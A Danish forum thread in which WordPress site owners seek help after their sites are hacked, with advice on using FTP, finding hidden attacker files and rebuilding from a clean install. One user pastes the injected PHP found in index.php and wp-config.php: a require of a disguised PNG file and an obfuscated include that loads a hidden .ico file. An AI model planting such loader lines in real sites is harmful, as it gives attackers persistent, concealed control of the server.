Siden http://www.frh-kajakklub.dk har uden vores viden fået tilføjet undermappen "deep", se linket:
http://www.frh-kajakklub.dk/deep
Hvordan fjerner jeg denne undermappe?
Siden http://www.frh-kajakklub.dk har uden vores viden fået tilføjet undermappen "deep", se linket:
http://www.frh-kajakklub.dk/deep
Hvordan fjerner jeg denne undermappe?
Hvordan ser der ud når du kigger på mappestrukturen og filer i FTP?
er der en "deep" mappe?
Hvis der er en mappe som ikke skal være der, så er siden blevet hacket og der gemmer sig helt sikkert mere end blot denne. Hackere lægger som regel også andre spor til deres kolleger.
Hej Boldt
Tak forhurtigt svar.
Jeg redigere kun hjemmesiden via WordPress som administrator.
Hvordan (undskyld mit uvidende spørgsmål) tilgår jeg hjemmesiden med et FTP program, og hvilket kan du anbefale?
Nogle webhoteller har et filemanagement system i deres administrationspanel til erstatning for FTP.
Jeg bruger FileZilla som hentes her: https://filezilla-project.org/
Vælg: Filezilla Client - all platforms
Programmet installeres på din pc.
For at kunne bruge FTP skal du fra dit Webhotel have følgende oplysninger:
Vært (server adressen)
Brugernavn
Adgangskode
port nr
Programmet er let at bruge. Indtast dine FTP-oplysninger og du får adgang.
I venstre side har du indholdet af din egen pc, og i højre har du indholdet af dit webhotel.
Tak Boldt
Jeg går i gang :-)
Hejsa jeg er med på en lytter her for jeg har samme problem.
men jeg har ikke nogen mapper i root eller andre steder.
hvor kan jeg lede efter hullet ?
nogen der har nogen ider?
i kan se det her
http://kvindeluner.dk/uzma-s96713-morv-xlppxmgtzvtbntc/
@Landsteen
Din side er blevet hacket!!!
Hvordan fandt du ud af at din side var blevet hacket?
Der er mange steder ting kan gemmes: .htaccess, jpg, txt, index.htm (og index.php) i billed-mapper, i plugin-mapper, i tema-mapper
Det er svært at finde ud af, hvor hackerens filer gemmer sig.
Det er svært at sige, hvordan hullet er opstået:
i en gammel - ikke opdateret - plugin eller tema.
i en mappe, oprettet af dig eller "den gamle plugin/tema" som aldrig er blevet sikret med en index.php fil og begrænsning i adgang.
Det kan også komme fra en anden hjemmeside på dit webhotel enten en du selv ejer eller en ukendt.
Der er kun en rigtig ting at gøre: indlæs din backup.
Alternativt kan din hjemmeside reddes ved at lede efter afvigelser i installationen.
Er index.php større end forventet? Er der billeder, plugins eller temaer som du ikke kender?
Men en standard-installation af WP indeholder 1.709 filer og 172 mapper
+ mapper og filer for hvert tema og plugin du efter følgende installerer
+ billeder, i 4 versioner, organiseret i undermapper.
Det er ikke til at overskue.
Når en side bliver hacket går det som regel ikke ud over Databasen. Derfor er det muligt at lægge en ny wp-installation i et renset/tomt webhotel.
MEN PAS PÅ - DET ER DIT EGET ANSVAR, HVIS DET GÅR GALT!
Først skal alt fra webhotellet kopieres til egen pc med dit FTP program(så har du en - befængt - backup), og så skal følgende filer flytte til en frisk WP.
En frisk WP-zip hentes fra wordpress.org og udpakkes.
Du skal gemme filen wp-config.php, da den indeholder info om din hjemmeside database, mv.
Du skal gemme mappen wp-content/uploads da den indeholder dine billeder, og andet.
ovenstående filer skal gennemgås med en "tættekam" er der noget som er forkert eller ikke kan genkendes skal det slettes.
(i gamle dage skulle man også fjerne en installations-fil fra den friske wp, men jeg kan ikke finde den så måske eksisterer den ikke mere)
Når filerne er tilføjet lægges det hele op på webhotellet (i den tømte mappe) med dit FTP-program.
Nu har du så - forhåbentlig - en standard installation af af din hjemmeside med alt indhold og du kan nu gå i kontrolpanelet og tilføje det rigtige tema og de plugins du bruger.
HUSK!
Der er på eget ansvar hvis du kaster dig ud i ovenstående.
Desuden
Hold orden i din WP installation (Hold WP, Plugins, Temaer opdateret, slet plugins du ikke bruger, find erstatning for plugins som ikke vedligeholdes, slet temaer du ikke bruger - undtagen Twenty... )
Tænk sikkerhed. Brug en sikkerhedsplugins til overvågning af illegal aktivitet.
(Jeg skriver senere et indlæg om hvordan jeg har sikret mine hjemmesider)
Hold da op sikke en smøremen der er vel kun den kedelige vej så.
Det var faktisk google der fandt det for migsearch.google.com men havde godt set min indtjening var faldet en del men tænkte ikke meget over det for det er længe siden jeg havde opdateret siden med nye ting.
Vender lige tilbage hvis jeg finder noget.
kan ikke finde noget i db'en eller i .htaccess
Glemte lige at sige rigtige mænd tager ikke backup de tuder lol
og jeg er så ham der tuder for glemmer altid at tage backup
Kan det være rigtig at index.php skal se sådan her ud ?
<?php
//installbg
$rifilename='/home/www/kvindeluner.dk/wp-includes/images/media/logo_s.png';
require("$rifilename");
//installend
/*49426*/
@include "57home57www/\153vind\145lune\162.dk/\160hp-f\165sion57infu\163ions57late\163t_vi\144eo_c\157mmen\164s_pa\156el/.\1455fff\144a1.i\143o";
/*49426*/
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
Der er en index.php i samtlige mapper for at beskytte din wordpress imod ulovlig indtrængen.
Hvilken en er det du viser?
Men, du har ret. Den ser mistænkelig ud.
index.php i roden viser:
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*//**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
index.php i tema viser noget opbygning af side.(header, footer, loop, ...)
alle andre index.php viser:
<?php
// Silence is golden.
Det er index.php i root den i tema ser rigtig nok ud.
fandt også
//installbg
$rifilename='/home/www/kvindeluner.dk/wp-includes/images/media/logo_s.png';
require("$rifilename");
//installend
/*49426*/
@include "57home57www/\153vind\145lune\162.dk/\160hp-f\165sion57infu\163ions57late\163t_vi\144eo_c\157mmen\164s_pa\156el/.\1455fff\144a1.i\143o";
/*49426*/
i wp-config
det har jeg fjernet nu men den der png fil undre mig lidt, kan ikke lige plasere hvor den skal bruges og når jeg åbner den i wordpad kommer der en masse tags frem som passer til siden.
har overvejet at lægge nye filer i /home/www/kvindeluner.dk/wp-includes/images/media/ og slette alle andre filer der er i den mappe, så det bare øv hvis jeg midster noget
Se her.
har døbt den ene fil om fra png til txt og se en gang
http://kvindeluner.dk/wp-includes/images/dddddddddddddddddddddddddddmedia/logo_s.txt
ja, det er uhyggeligt så udspekulerede hackerne er.
wp-includes er en mappe som vi andre aldrig arbejder i, da det er hjemstedet for WordPress-motoren.
Ærgerligt man ikke kan kinesisk, det kunne være sjovt at se, hvilket budskab de ønsker at sprede.
Husk der skal skiftes password på webhotel og FTP adgang.
Jeg bruger bla. iThemes Security plugin. jeg husker en gang jeg var blevet angrebet og efterfølgende havde en ren installation, hvordan det væltede op med 404 fejl fordi hackere søgte efter filer som ikke længere var.
:( Jeg må i gang med en ren installation for alt er fucket op men håber jeg kan slippe for at uploade alle billeder mv.
Du skal være logget ind for at skrive.